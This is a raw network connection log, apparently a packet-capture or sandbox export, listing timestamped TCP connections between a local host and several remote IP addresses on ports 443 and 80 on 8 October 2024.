Oct 8, 2024 20:47:46.305334091 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:46.305417061 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:46.305586100 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:46.305600882 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:46.374711037 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.374805927 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:46.374968052 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.375309944 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.375346899 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:46.488507986 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.495739937 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.497399092 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.498577118 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.504187107 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.517417908 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.517462969 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.517919064 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.517932892 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.518188953 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.518220901 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.518554926 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.518565893 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.518752098 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.518769979 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.519048929 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.519059896 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.520478010 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.520500898 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.523068905 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.523075104 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.523344994 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.523375988 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.526530981 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.526540995 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.614125967 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.614737034 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.614783049 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.614846945 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.615010023 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.615084887 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.615119934 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.615169048 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.615185022 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.616683960 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.616753101 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.616853952 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.616914034 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.617975950 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.618055105 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.618088007 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.618113041 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.618139982 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.618145943 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.618156910 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.619029045 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.619064093 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.620182037 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.620217085 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.620271921 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.620492935 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.620560884 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.620619059 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.620619059 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.621428013 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.621428967 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.621448040 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.621465921 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.621639013 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.621736050 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.621788025 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.622437954 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.622484922 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.622549057 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.622564077 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.622580051 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.622596979 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.622605085 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.622690916 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.622721910 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.624475002 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.624494076 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.624562025 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.624674082 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.624686003 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.624967098 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.625099897 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.625179052 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.625302076 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.625328064 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.625354052 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.625365973 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.626852036 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.626861095 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.627235889 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.627326012 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:46.627335072 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.879576921 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:46.879777908 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.881180048 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.881210089 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:46.881735086 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:46.882894039 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.882936001 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:46.883003950 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:47.431153059 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:47.431217909 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:47.431447029 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:47.583225012 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:47.583298922 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:47.583338022 CEST	49917	443	192.168.2.5	172.67.205.156
Oct 8, 2024 20:47:47.583357096 CEST	443	49917	172.67.205.156	192.168.2.5
Oct 8, 2024 20:47:47.614335060 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.620666027 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.621851921 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.622011900 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.630712032 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.653666973 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.653691053 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.654635906 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.657608986 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.657613993 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.657934904 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.657963037 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658001900 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.658061028 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658339024 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.658350945 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658375025 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.658389091 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658552885 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.658560038 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658653021 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.658711910 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658881903 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.658885956 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.658984900 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.659012079 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.681796074 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:47.681863070 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:47.682145119 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:47.682483912 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:47.682511091 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:47.754187107 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.754281044 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.754344940 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.754399061 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.754548073 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.754570961 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.754595995 CEST	49918	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.754632950 CEST	443	49918	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.754765987 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.755990982 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756043911 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.756062984 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756099939 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756139040 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.756159067 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756179094 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.756184101 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756217957 CEST	49922	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.756222010 CEST	443	49922	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756439924 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756457090 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756508112 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.756515980 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.756611109 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.758471012 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.758647919 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.758718014 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.760389090 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.760426044 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.760451078 CEST	49919	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.760466099 CEST	443	49919	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.760612965 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.760618925 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.760629892 CEST	49921	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.760632992 CEST	443	49921	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.763920069 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.763988972 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.764045000 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.764178038 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.764178038 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.765918016 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.765970945 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.766057968 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.766313076 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.766345024 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.768790960 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.768841028 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.769198895 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.769284964 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.769285917 CEST	49920	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.769330978 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.769357920 CEST	443	49920	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.769779921 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.769809008 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.774007082 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.774027109 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.774116993 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.774261951 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.774286985 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.775468111 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.775489092 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.775559902 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.777101040 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.777185917 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.777254105 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.777278900 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:47.777278900 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.777378082 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:47.777410984 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.140135050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:48.148941040 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.149059057 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.149111032 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:48.151159048 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.151190996 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.151437044 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.152759075 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.152801037 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.152842999 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.766520023 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.766582966 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.766674042 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.766855955 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.766896009 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.766926050 CEST	49923	443	192.168.2.5	172.67.140.193
Oct 8, 2024 20:47:48.766942978 CEST	443	49923	172.67.140.193	192.168.2.5
Oct 8, 2024 20:47:48.772938013 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.772949934 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.773624897 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.773626089 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.773690939 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.773742914 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.774030924 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.774044037 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.774085999 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.774096012 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.776839972 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.777208090 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.777242899 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.777604103 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.777611017 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.777925014 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.778255939 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.778284073 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.778645992 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.778651953 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.778677940 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.778959990 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.778969049 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.779299974 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.779305935 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.784432888 CEST	49929	443	192.168.2.5	104.21.30.221
Oct 8, 2024 20:47:48.784526110 CEST	443	49929	104.21.30.221	192.168.2.5
Oct 8, 2024 20:47:48.784614086 CEST	49929	443	192.168.2.5	104.21.30.221
Oct 8, 2024 20:47:48.784925938 CEST	49929	443	192.168.2.5	104.21.30.221
Oct 8, 2024 20:47:48.784964085 CEST	443	49929	104.21.30.221	192.168.2.5
Oct 8, 2024 20:47:48.876858950 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.876905918 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.876986027 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.877053976 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.877110958 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.877186060 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.877723932 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.877758026 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.877774954 CEST	49925	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.877783060 CEST	443	49925	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.877863884 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.877863884 CEST	49927	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.877897024 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.877923012 CEST	443	49927	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878503084 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878535032 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878535032 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878570080 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878596067 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.878643036 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.878664970 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878716946 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.878720045 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.878727913 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.878757954 CEST	49926	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.878763914 CEST	443	49926	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.879761934 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.879781008 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.879797935 CEST	49928	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.879805088 CEST	443	49928	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882044077 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882124901 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882188082 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.882209063 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882236004 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882302999 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.882559061 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.882594109 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882663012 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.882664919 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.882690907 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.882761002 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.883304119 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.883354902 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.883435965 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.883512020 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.883524895 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.883558989 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.883574963 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.883605957 CEST	49924	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.883619070 CEST	443	49924	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.884605885 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.884640932 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.884713888 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.884802103 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.884835005 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.884948969 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.884968996 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.885082960 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.885097980 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.886383057 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.886392117 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:48.886496067 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.886698961 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:48.886708975 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.061286926 CEST	49929	443	192.168.2.5	104.21.30.221
Oct 8, 2024 20:47:49.089335918 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.089433908 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:49.089565039 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.089849949 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.089874029 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:49.534039974 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.534765959 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.534781933 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.537482023 CEST	443	49935	13.107.246.60	192.168.2.5
